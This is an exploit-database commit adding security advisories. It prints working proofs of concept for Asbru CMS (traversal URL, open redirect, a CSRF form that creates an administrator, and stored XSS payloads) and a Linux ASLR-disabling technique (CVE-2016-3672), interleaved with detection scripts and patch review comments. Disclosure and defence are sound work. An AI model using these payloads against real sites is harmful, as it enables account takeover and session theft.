DB: 2016-04-07

5 new exploits

Asbru Web Content Management System 9.2.7 - Multiple Vulnerabilities
SocialEngine 4.8.9 - SQL Injection
Linux x86 - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited
Panda Security URL Filtering < 4.3.1.9 - Privilege Escalation
Panda Endpoint Administration Agent < 7.50.00 - Privilege Escalation
Offensive Security 2016-04-07 05:01:52 +00:00
parent 60fd0ef490
commit 48af7fb829
6 changed files with 726 additions and 0 deletions

@ -35888,3 +35888,8 @@ id,file,description,date,author,platform,type,port
39663,platforms/windows/dos/39663.html,"Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",windows,dos,0
39664,platforms/jsp/webapps/39664.txt,"ManageEngine Password Manager Pro 8102 to 8302 - Multiple Vulnerabilities",2016-04-05,S3ba,jsp,webapps,7272
39666,platforms/windows/local/39666.txt,"Windows Kernel Win32k.sys Privilege Escalation Exploit (MS14-058)",2016-04-05,"MWR InfoSecurity",windows,local,0
39667,platforms/jsp/webapps/39667.txt,"Asbru Web Content Management System 9.2.7 - Multiple Vulnerabilities",2016-04-06,LiquidWorm,jsp,webapps,80
39668,platforms/php/webapps/39668.txt,"SocialEngine 4.8.9 - SQL Injection",2016-04-06,"High-Tech Bridge SA",php,webapps,80
39669,platforms/linux/dos/39669.txt,"Linux x86 - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco and Ismael Ripoll",linux,dos,0
39670,platforms/windows/local/39670.txt,"Panda Security URL Filtering < 4.3.1.9 - Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local,0
39671,platforms/windows/local/39671.txt,"Panda Endpoint Administration Agent < 7.50.00 - Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local,0
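Review bot: the `type` column for 39669 says `dos`, but the description on that line ("Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited") and the advisory itself describe an ASLR-weakening technique with no denial-of-service component; the neighbouring privilege-related entries 39670 and 39671 use `local`, and a searcher looking for ASLR bypass material will not look under `dos`, so consider re-typing the row (e.g. `local`) when the CSV is next touched.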

platforms/jsp/webapps/39667.txt

Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities
Vendor: Asbru Ltd.
Product web page: http://www.asbrusoft.com
Affected version: 9.2.7
Summary: Ready to use, full-featured, database-driven web content management
system (CMS) with integrated community, databases, e-commerce and statistics
modules for creating, publishing and managing rich and user-friendly Internet,
Extranet and Intranet websites.
Desc: Asbru WCM suffers from multiple vulnerabilities: Directory Traversal (information
disclosure of WEB-INF/web.xml), Open Redirect, Cross-Site Request Forgery and Stored Cross-Site Scripting.
Tested on : Apache Tomcat/5.5.23
Apache/2.2.3 (CentOS)
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5314
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php
09.03.2016
--
#1
Directory Traversal (Information Disclosure):
--------------------------------------------
http://10.0.0.7/../../../../../WEB-INF/web.xml
(A servlet container never serves WEB-INF/ directly, so a 200 response carrying the
deployment descriptor confirms the traversal and discloses the application's servlet
mappings and security constraints.)
#2
Open Redirect:
--------------
http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk
#3
Cross-Site Request Forgery (Add 'administrator' With Full Privileges):
----------------------------------------------------------------------
<html>
<body>
<form action="http://10.0.0.7/webadmin/users/create_post.jsp?id=&redirect=" method="POST">
<input type="hidden" name="userinfo" value="&#13;&#10;<TEST><&#47;TEST>&#13;&#10;" />
<input type="hidden" name="title" value="Mr" />
<input type="hidden" name="name" value="Chekmidash" />
<input type="hidden" name="organisation" value="ZSL" />
<input type="hidden" name="email" value="test&#64;testingus&#46;io" />
<input type="hidden" name="gender" value="1" />
<input type="hidden" name="birthdate" value="1984&#45;01&#45;01" />
<input type="hidden" name="birthday" value="01" />
<input type="hidden" name="birthmonth" value="01" />
<input type="hidden" name="birthyear" value="1984" />
<input type="hidden" name="notes" value="CSRFNote" />
<input type="hidden" name="userinfo1" value="" />
<input type="hidden" name="userinfoname" value="" />
<input type="hidden" name="username" value="hackedusername" />
<input type="hidden" name="password" value="password123" />
<input type="hidden" name="userclass" value="administrator" />
<input type="hidden" name="usergroup" value="" />
<input type="hidden" name="usertype" value="" />
<input type="hidden" name="usergroups" value="Account&#32;Managers" />
<input type="hidden" name="usergroups" value="Company&#32;Bloggers" />
<input type="hidden" name="usergroups" value="Customer" />
<input type="hidden" name="usergroups" value="Event&#32;Managers" />
<input type="hidden" name="usergroups" value="Financial&#32;Officers" />
<input type="hidden" name="usergroups" value="Forum&#32;Moderator" />
<input type="hidden" name="usergroups" value="Human&#32;Resources" />
<input type="hidden" name="usergroups" value="Intranet&#32;Managers" />
<input type="hidden" name="usergroups" value="Intranet&#32;Users" />
<input type="hidden" name="usergroups" value="Newsletter" />
<input type="hidden" name="usergroups" value="Press&#32;Officers" />
<input type="hidden" name="usergroups" value="Product&#32;Managers" />
<input type="hidden" name="usergroups" value="Registered&#32;Users" />
<input type="hidden" name="usergroups" value="Shop&#32;Managers" />
<input type="hidden" name="usergroups" value="Subscribers" />
<input type="hidden" name="usergroups" value="Support&#32;Ticket&#32;Administrators" />
<input type="hidden" name="usergroups" value="Support&#32;Ticket&#32;Users" />
<input type="hidden" name="usergroups" value="User&#32;Managers" />
<input type="hidden" name="usergroups" value="Website&#32;Administrators" />
<input type="hidden" name="usergroups" value="Website&#32;Developers" />
<input type="hidden" name="users&#95;group" value="" />
<input type="hidden" name="users&#95;type" value="" />
<input type="hidden" name="creators&#95;group" value="" />
<input type="hidden" name="creators&#95;type" value="" />
<input type="hidden" name="editors&#95;group" value="" />
<input type="hidden" name="editors&#95;type" value="" />
<input type="hidden" name="publishers&#95;group" value="" />
<input type="hidden" name="publishers&#95;type" value="" />
<input type="hidden" name="administrators&#95;group" value="" />
<input type="hidden" name="administrators&#95;type" value="" />
<input type="hidden" name="scheduled&#95;publish" value="2016&#45;03&#45;13&#32;00&#58;00" />
<input type="hidden" name="scheduled&#95;publish&#95;email" value="" />
<input type="hidden" name="scheduled&#95;notify" value="" />
<input type="hidden" name="scheduled&#95;notify&#95;email" value="" />
<input type="hidden" name="scheduled&#95;unpublish" value="" />
<input type="hidden" name="scheduled&#95;unpublish&#95;email" value="" />
<input type="hidden" name="invoice&#95;name" value="Icebreaker" />
<input type="hidden" name="invoice&#95;organisation" value="Zero&#32;Science&#32;Lab" />
<input type="hidden" name="invoice&#95;address" value="nu" />
<input type="hidden" name="invoice&#95;postalcode" value="1300" />
<input type="hidden" name="invoice&#95;city" value="Neverland" />
<input type="hidden" name="invoice&#95;state" value="ND" />
<input type="hidden" name="invoice&#95;country" value="ND" />
<input type="hidden" name="invoice&#95;phone" value="111&#45;222&#45;3333" />
<input type="hidden" name="invoice&#95;fax" value="" />
<input type="hidden" name="invoice&#95;email" value="lab&#64;zeroscience&#46;tld" />
<input type="hidden" name="invoice&#95;website" value="www&#46;zeroscience&#46;mk" />
<input type="hidden" name="delivery&#95;name" value="" />
<input type="hidden" name="delivery&#95;organisation" value="" />
<input type="hidden" name="delivery&#95;address" value="" />
<input type="hidden" name="delivery&#95;postalcode" value="" />
<input type="hidden" name="delivery&#95;city" value="" />
<input type="hidden" name="delivery&#95;state" value="" />
<input type="hidden" name="delivery&#95;country" value="" />
<input type="hidden" name="delivery&#95;phone" value="" />
<input type="hidden" name="delivery&#95;fax" value="" />
<input type="hidden" name="delivery&#95;email" value="" />
<input type="hidden" name="delivery&#95;website" value="" />
<input type="hidden" name="card&#95;type" value="VISA" />
<input type="hidden" name="card&#95;number" value="4444333322221111" />
<input type="hidden" name="card&#95;issuedmonth" value="01" />
<input type="hidden" name="card&#95;issuedyear" value="2016" />
<input type="hidden" name="card&#95;expirymonth" value="01" />
<input type="hidden" name="card&#95;expiryyear" value="2100" />
<input type="hidden" name="card&#95;name" value="Hacker&#32;Hackerowsky" />
<input type="hidden" name="card&#95;cvc" value="133" />
<input type="hidden" name="card&#95;issue" value="" />
<input type="hidden" name="card&#95;postalcode" value="1300" />
<input type="hidden" name="content&#95;editor" value="" />
<input type="hidden" name="hardcore&#95;upload" value="" />
<input type="hidden" name="hardcore&#95;format" value="" />
<input type="hidden" name="hardcore&#95;width" value="" />
<input type="hidden" name="hardcore&#95;height" value="" />
<input type="hidden" name="hardcore&#95;onenter" value="" />
<input type="hidden" name="hardcore&#95;onctrlenter" value="" />
<input type="hidden" name="hardcore&#95;onshiftenter" value="" />
<input type="hidden" name="hardcore&#95;onaltenter" value="" />
<input type="hidden" name="hardcore&#95;toolbar1" value="" />
<input type="hidden" name="hardcore&#95;toolbar2" value="" />
<input type="hidden" name="hardcore&#95;toolbar3" value="" />
<input type="hidden" name="hardcore&#95;toolbar4" value="" />
<input type="hidden" name="hardcore&#95;toolbar5" value="" />
<input type="hidden" name="hardcore&#95;formatblock" value="" />
<input type="hidden" name="hardcore&#95;fontname" value="" />
<input type="hidden" name="hardcore&#95;fontsize" value="" />
<input type="hidden" name="hardcore&#95;customscript" value="" />
<input type="hidden" name="startpage" value="" />
<input type="hidden" name="workspace&#95;sections" value="" />
<input type="hidden" name="index&#95;workspace" value="" />
<input type="hidden" name="index&#95;content" value="" />
<input type="hidden" name="index&#95;library" value="" />
<input type="hidden" name="index&#95;product" value="" />
<input type="hidden" name="index&#95;stock" value="" />
<input type="hidden" name="index&#95;order" value="" />
<input type="hidden" name="index&#95;segments" value="" />
<input type="hidden" name="index&#95;usertests" value="" />
<input type="hidden" name="index&#95;heatmaps" value="" />
<input type="hidden" name="index&#95;user" value="" />
<input type="hidden" name="index&#95;websites" value="" />
<input type="hidden" name="menu&#95;selection" value="" />
<input type="hidden" name="statistics&#95;reports" value="" />
<input type="hidden" name="sales&#95;reports" value="" />
<input type="submit" value="Initiate" />
</form>
</body>
</html>
#4
Stored Cross-Site Scripting:
----------------------------
a)
POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1
Host: 10.0.0.7
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="webeditor_stylesheet"
/stylesheet.jsp?id=1,1&device=&useragent=&
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="restore"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="archive"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publish"
Save & Publish
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_publish"
2016-03-09 13:29
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_unpublish"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="checkedout"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="revision"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="title"
"><script>alert(document.cookie)</script>
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="searchable"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="menuitem"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file"; filename="test.svg"
Content-Type: image/svg+xml
testsvgxxefailed
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file_data"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="server_filename"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentdelivery"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image1"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image2"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image3"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfo"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentation"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="author"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="description"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="keywords"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfoname"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationname"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationvalue"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentpackage"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentclass"
image
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentgroup"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contenttype"
Photos
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version_master"
0
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="device"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usersegment"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usertest"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_top"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_up"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_previous"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_next"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_first"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_last"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="related"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="selectrelated"
------WebKitFormBoundarygqlN2AtccVFqx0YN--
b)
POST /webadmin/fileformats/create_post.jsp HTTP/1.1
Host: 10.0.0.7
filenameextension="><script>alert(document.cookie)</script>
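The three request-level issues above (the traversal into WEB-INF, the open redirect through url=, and the cross-origin POST that the CSRF form sends to the user-creation endpoint) are easy to spot after the fact in access logs. The following detector is an added example, not part of the ZSL advisory or of the Asbru product; the log line format, the client addresses and the sample lines are constructed, while the endpoint paths and the 10.0.0.7 test host come from the advisory. It goes slightly beyond the advisory by double-decoding the path (to catch %252e-style encodings) and by checking any redirect-style parameter, not only the one PoC URL.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed log format (an assumption, not the CMS's own log):
#   <client-ip> "<METHOD> <request-target>" <status> "<referer>"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<target>\S+)" (?P<status>\d{3}) "(?P<referer>[^"]*)"$'
)

SITE_HOSTS = {"10.0.0.7"}               # the test host from the advisory; adjust per site
REDIRECT_PARAMS = {"url", "redirect"}   # login_post.jsp?url= and create_post.jsp?redirect=
ADMIN_STATE_CHANGERS = {                # POST endpoints the CSRF and XSS PoCs hit
    "/webadmin/users/create_post.jsp",
    "/webadmin/content/create_post.jsp",
    "/webadmin/fileformats/create_post.jsp",
}


def normalized_path(raw_path):
    """Percent-decode twice (catches %252e%252e) and collapse '..' the way a
    lenient front end might, so '/../../WEB-INF/web.xml' -> '/WEB-INF/web.xml'."""
    decoded = unquote(unquote(raw_path))
    return posixpath.normpath("/" + decoded.lstrip("/"))


def classify(line):
    """Return a list of finding tags for one log line ([] if clean, None if unparsable)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method, referer = m.group("method"), m.group("referer")
    parts = urlsplit(m.group("target"))
    raw_path, query = parts.path, parse_qs(parts.query)
    findings = []

    # 1) Directory traversal: a '..' segment in the decoded path. Tag it when the
    #    normalized path lands in WEB-INF, which a container never serves.
    if ".." in unquote(unquote(raw_path)).split("/"):
        tag = "traversal"
        if normalized_path(raw_path).startswith("/WEB-INF/"):
            tag += ":WEB-INF"
        findings.append(tag)

    # 2) Open redirect: a redirect parameter carrying an absolute URL to a foreign host.
    for name in sorted(REDIRECT_PARAMS & set(query)):
        for value in query[name]:
            host = urlsplit(unquote(value)).hostname
            if host and host not in SITE_HOSTS:
                findings.append(f"open-redirect:{name}->{host}")

    # 3) CSRF candidate: a state-changing admin POST whose Referer is missing or
    #    from another origin. A missing Referer is only a weak signal on its own.
    if method == "POST" and raw_path in ADMIN_STATE_CHANGERS:
        ref_host = urlsplit(referer).hostname if referer else None
        if ref_host not in SITE_HOSTS:
            findings.append("csrf-candidate:" + (ref_host or "no-referer"))
    return findings


def scan(log_text):
    """Return [(client_ip, findings)] for every line that produced a finding."""
    hits = []
    for line in log_text.splitlines():
        findings = classify(line)
        if findings:
            hits.append((line.split(" ", 1)[0], findings))
    return hits


# Constructed sample: the three PoC requests from the advisory plus two benign lines.
SAMPLE_LOG = """\
203.0.113.5 "GET /../../../../../WEB-INF/web.xml" 200 "-"
203.0.113.5 "GET /login_post.jsp?url=http://www.zeroscience.mk" 302 "http://10.0.0.7/login.jsp"
203.0.113.5 "POST /webadmin/users/create_post.jsp?id=&redirect=" 302 "http://attacker.example/csrf.html"
198.51.100.9 "GET /index.jsp" 200 "-"
198.51.100.9 "POST /webadmin/users/create_post.jsp?id=&redirect=" 302 "http://10.0.0.7/webadmin/users/create.jsp"
"""

if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, ", ".join(findings))
```

The CSRF check is deliberately the weakest of the three: browsers may strip the Referer, so treat a hit as a prompt to look at the session that made the request, not as proof on its own. The traversal and redirect checks are decisive because the advisory's requests are unambiguous once decoded.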

platforms/linux/dos/39669.txt

Source: http://hmarco.org/bugs/CVE-2016-3672-Unlimiting-the-stack-not-longer-disables-ASLR.html
CVE-2016-3672 - Unlimiting the stack no longer disables ASLR
Authors: Hector Marco & Ismael Ripoll
CVE: CVE-2016-3672
Dates: April 2016
Description
We have fixed an old and well-known weakness in the Linux ASLR implementation.
Any user able to run 32-bit applications on an x86 machine can disable ASLR by setting the RLIMIT_STACK resource to unlimited.
The following steps test whether a system is affected:
1) Create a dummy program which shows its memory map:
#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* getpid() */

/* Print this process's own memory map so the libc base can be compared across runs. */
int main(int argc, const char *argv[])
{
char cmd[256];
snprintf(cmd, sizeof cmd, "cat /proc/%d/maps", (int)getpid());
system(cmd);
return 0;
}
2) Compile it:
$ gcc show_maps.c -o show_maps        # on an i386 machine
$ gcc show_maps.c -o show_maps -m32   # on a 64-bit machine (32-bit build)
3) Run the application to check that ASLR is working
$ for i in `seq 1 10`; do ./show_maps | grep "r-xp.*libc"; done
f75c4000-f7769000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75db000-f7780000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7557000-f76fc000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7595000-f773a000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7574000-f7719000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75af000-f7754000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7530000-f76d5000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7529000-f76ce000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75c2000-f7767000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75fe000-f77a3000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
The libc-2.19.so library is mapped at a different address on each run, so ASLR is working.
Now we run the same test, but with the stack size set to unlimited:
$ ulimit -a | grep stack
stack size (kbytes, -s) 8192
$ ulimit -s unlimited
$ ulimit -a | grep stack
stack size (kbytes, -s) unlimited
$ for i in `seq 1 10`; do ./show_maps | grep "r-xp.*libc"; done
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
The libc-2.19.so library is mapped at the same address in every run: ASLR has been disabled.
This is a very old trick to disable ASLR, but it still works on current Linux systems.
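The shell procedure above can be scripted so the verdict is a boolean rather than ten lines to eyeball. The following is an added example, not the authors' code: it parses /proc/<pid>/maps output for the executable mapping of libc, runs the show_maps binary from step 2 repeatedly (assumed to be at ./show_maps, and on a 64-bit host it must be the -m32 build) with RLIMIT_STACK raised to unlimited in the child, and reports whether the base stops moving. The sample addresses are taken from the two listings above.

```python
import re
import resource
import subprocess

MAP_LINE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+) ([rwxps-]{4}) ")


def exec_base(maps_text, needle="libc"):
    """Start address of the first executable (x) mapping whose line mentions
    `needle`, parsed from /proc/<pid>/maps text; None if there is none."""
    for line in maps_text.splitlines():
        m = MAP_LINE.match(line)
        if m and "x" in m.group(3) and needle in line:
            return int(m.group(1), 16)
    return None


def randomized(bases):
    """True when the mapping landed at two or more distinct addresses."""
    return len({b for b in bases if b is not None}) > 1


def observe_bases(binary="./show_maps", runs=10, unlimited_stack=False, needle="libc"):
    """Run `binary` (the show_maps program from step 1, which prints its own
    maps) `runs` times and collect the base of `needle`. With
    unlimited_stack=True each child starts under RLIMIT_STACK=RLIM_INFINITY,
    which is what `ulimit -s unlimited` does; rlimits survive execve(), so
    the child sees exactly the limit the shell-based test sets."""
    def raise_stack_limit():
        if unlimited_stack:
            inf = resource.RLIM_INFINITY
            # Raises ValueError if the hard limit is below infinity; in that
            # case the test cannot be run from this account.
            resource.setrlimit(resource.RLIMIT_STACK, (inf, inf))

    bases = []
    for _ in range(runs):
        proc = subprocess.run([binary], capture_output=True, text=True,
                              preexec_fn=raise_stack_limit)
        bases.append(exec_base(proc.stdout, needle))
    return bases


def system_affected(binary="./show_maps"):
    """CVE-2016-3672 verdict: libc moves under the default stack limit but
    sits at a fixed address once the stack is unlimited."""
    return (randomized(observe_bases(binary, unlimited_stack=False))
            and not randomized(observe_bases(binary, unlimited_stack=True)))


# Constructed from the advisory's two output listings (one libc line per run).
SAMPLE_RUNS_RANDOM = [
    "f75c4000-f7769000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so",
    "f75db000-f7780000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so",
    "f7557000-f76fc000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so",
]
SAMPLE_RUNS_FIXED = ["5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so"] * 3


def verdict_from_samples():
    """Apply the same decision to the recorded samples: (default limit, unlimited)."""
    return (randomized([exec_base(t) for t in SAMPLE_RUNS_RANDOM]),
            randomized([exec_base(t) for t in SAMPLE_RUNS_FIXED]))


if __name__ == "__main__":
    print("ASLR lost with unlimited stack:", system_affected())
```

Ten runs is enough in practice: with randomization on, the chance that all ten land on the same page is negligible, and with the legacy layout they are identical every time, as the listing above shows. If system_affected() returns False on a host you expect to be vulnerable, check that the binary is really 32-bit (file ./show_maps) and that the hard stack limit allowed setrlimit() to succeed.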
Vulnerable packages
As far as we know, the weakness has been present since the first version in the current Linux git repository, Linux 2.6.12-rc2 (April 2005).
Impact
An attacker capable of running 32-bit applications on an x86 machine can disable ASLR for any application he can launch, including sensitive setuid and setgid programs. Note that this is not an exploitable vulnerability by itself but a trick to disable ASLR; an attacker can use it while exploiting some other bug. Since i386 is still widely used, the number of affected systems and users could be extremely large.
The weakness
The issue arises because the Linux ASLR implementation does not always randomize the mmap base address when the stack size is set to unlimited. Concretely, on i386, and on x86_64 when running x86_32 binaries, the legacy (bottom-up) layout randomizes only the stack and the executable, not the other mmapped objects (libraries, vDSO, etc.). Depending on the Linux version, the executable is not randomized either.
The function that computes the base for libraries when the stack is unlimited (the legacy layout) is mmap_legacy_base():
static unsigned long mmap_legacy_base(void)
{
if (mmap_is_ia32())
return TASK_UNMAPPED_BASE;
else
return TASK_UNMAPPED_BASE + mmap_rnd();
}
The function adds no random offset when mmap_is_ia32() is true, i.e. on a native 32-bit system (i386) or for a 32-bit process on x86_64 (x86_32).
Exploit
To exploit this weakness, the attacker only needs to set the stack limit to unlimited and then execute a 32-bit application. Resource limits are inherited across execve(), so a setuid or setgid program launched from that shell runs with the unrandomized legacy layout; such privileged programs are the obvious targets.
FIX
We have created a patch to fix this issue:
diff --git a/arch/x86/mm/mmap.c b/arch/x86/mm/mmap.c
index 96bd1e2..389939f 100644
--- a/arch/x86/mm/mmap.c
+++ b/arch/x86/mm/mmap.c
@@ -94,18 +94,6 @@ static unsigned long mmap_base(unsigned long rnd)
}
/*
- * Bottom-up (legacy) layout on X86_32 did not support randomization, X86_64
- * does, but not when emulating X86_32
- */
-static unsigned long mmap_legacy_base(unsigned long rnd)
-{
- if (mmap_is_ia32())
- return TASK_UNMAPPED_BASE;
- else
- return TASK_UNMAPPED_BASE + rnd;
-}
-
-/*
* This function, called very early during the creation of a new
* process VM image, sets up which VM layout function to use:
*/
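Review bot: this hunk deletes the only comment that explained the ia32 special case ("Bottom-up (legacy) layout on X86_32 did not support randomization, X86_64 does, but not when emulating X86_32") without putting anything in its place, so after the patch nothing near arch_pick_mmap_layout() records that the legacy layout is now randomized on i386 and x86_32 too; keep a one-line note there (or say it in the commit message) so the special case is not reintroduced by a later reader of mmap.c. Also confirm that the surviving `/*` on the context line above now opens the "This function, called very early ..." comment as intended, since the removed lines included that comment's own `/*`.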
@@ -116,7 +104,7 @@ void arch_pick_mmap_layout(struct mm_struct *mm)
if (current->flags & PF_RANDOMIZE)
random_factor = arch_mmap_rnd();
- mm->mmap_legacy_base = mmap_legacy_base(random_factor);
+ mm->mmap_legacy_base = TASK_UNMAPPED_BASE + random_factor;
if (mmap_is_legacy()) {
mm->mmap_base = mm->mmap_legacy_base;
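Review bot: `mm->mmap_legacy_base = TASK_UNMAPPED_BASE + random_factor;` feeds both layouts (the `if (mmap_is_legacy())` branch copies it into mm->mmap_base), and random_factor stays zero unless PF_RANDOMIZE is set, so non-randomized processes are unaffected; that invariant is worth stating explicitly in the commit message. Note also that the excerpt quoted earlier in this advisory shows mmap_legacy_base(void) calling mmap_rnd() itself, whereas the version this hunk replaces takes `rnd` as a parameter and receives arch_mmap_rnd(); the two are from different kernel versions, so the advisory should say which tree the patch applies to.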
The patch enables randomization for the libraries, vDSO and mmap requests on i386 and for x86_32 processes in legacy mode. We have sent the patch to the Linux maintainers, so upcoming kernel versions will not be affected: "Enable full randomization on i386 and X86_32".
Discussion
Although this weakness is not exploitable by itself, the truth is that ASLR is useless against local attacks on i386 and x86_32 systems whenever the attacker can launch the application being attacked.
Hector Marco - http://hmarco.org

platforms/php/webapps/39668.txt

Advisory ID: HTB23286
Product: SocialEngine
Vendor: Webligo
Vulnerable Version(s): 4.8.9 and probably prior
Tested Version: 4.8.9
Advisory Publication: December 21, 2015 [without technical details]
Vendor Notification: December 21, 2015
Public Disclosure: April 6, 2016
Vulnerability Type: SQL Injection [CWE-89]
Risk Level: High
